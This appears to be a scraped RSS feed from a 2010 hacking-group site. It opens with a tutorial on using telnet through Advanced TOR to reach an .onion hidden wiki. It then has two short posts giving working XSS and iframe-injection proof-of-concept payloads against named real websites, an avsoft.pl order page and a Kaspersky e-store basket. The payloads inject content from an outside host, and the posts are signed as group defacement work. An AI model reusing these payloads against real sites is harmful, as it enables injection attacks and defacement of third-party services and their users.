Version 0.1.0.5 of Advanced TOR can intercept all DNS / reverse DNS queries and redirect them to OR network. If an application doesn't always use its configured proxy settings, a warning message is shown in Debug window and its connection attempts and DNS queries are redirected. Those familiar with Tor know that Tor can work with addresses that can not be resolved by normal name servers. Addresses of hidden services (*.onion) are valid only in OR network but they are connect-only and they don't resolve to an IP. In this particular case, when a program calls a resolve function for an .onion address, AdvTor will return a fake IP in range 127.16.* and it will keep a cache with fake IPs + corresponding .onion addresses that will be used when a program wants to connect to one of these addresses.
As an example, let's see how we can use telnet to connect to the hidden wiki. First, we start a command prompt and use the "Force TOR" option to intercept its process creation functions and Winsock calls.

http://img691.imageshack.us/img691/8705/telnet1.png

To use telnet to connect to the hidden wiki, we can use the following command:
Code:
telnet kpvz7ki2v5agwt35.onion 80


http://img835.imageshack.us/img835/9609/telnet2.png

http://img189.imageshack.us/img189/1908/advtor1.png

When the connection is established, a good HTTP request with telnet:
Code:
GET /wiki/index.php/Main_Page HTTP/1.0
Accept: */*
Accept-Language: en-us
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: kpvz7ki2v5agwt35.onion
Connection: Keep-Alive



http://img685.imageshack.us/img685/7272/telnet3.png

See also:


]]>
http://nemesis.te-home.net/ Sun, 29 Aug 2010 13:20:40 GMT 3775427276
<![CDATA[avsoft.pl - XSS & IFrame Injection]]> http://nemesis.te-home.net/ http://www.avsoft.pl/pl/order.html?action=confirm

PoC:
Code:
"><h1>XSS BY TEAM ELITE</h1>
and
Code:
"><iframe src=http://nemesis.te-home.net></iframe>


http://img294.imageshack.us/img294/7066/avastqp.png
']['€AM€LiT€]]>
http://nemesis.te-home.net/ Wed, 1 Sep 2010 18:09:07 GMT 995017569
<![CDATA[Kaspersky eStore Powered by Softkey.ru XSS Vulnerability]]> http://nemesis.te-home.net/ http://kaspersky.softkey.ru/basket/

PoC:

Code:
"<br /><br /><img src=http://nemesis.te-home.net/img/logo.jpg /><br /><a href=http://nemesis.te-home.net/>http://nemesis.te-home.net/</a><a b=


http://desmond.yfrog.com/Himg80/scaled.php?tn=0&server=80&filename=kaspbasket.png&xsize=640&ysize=640

Note: This is a proof of concept and it doesn't reflect the views or interests of all above websites.
']['€AM€LiT€]]>
http://nemesis.te-home.net/ Thu, 2 Sep 2010 12:40:40 GMT 1225797292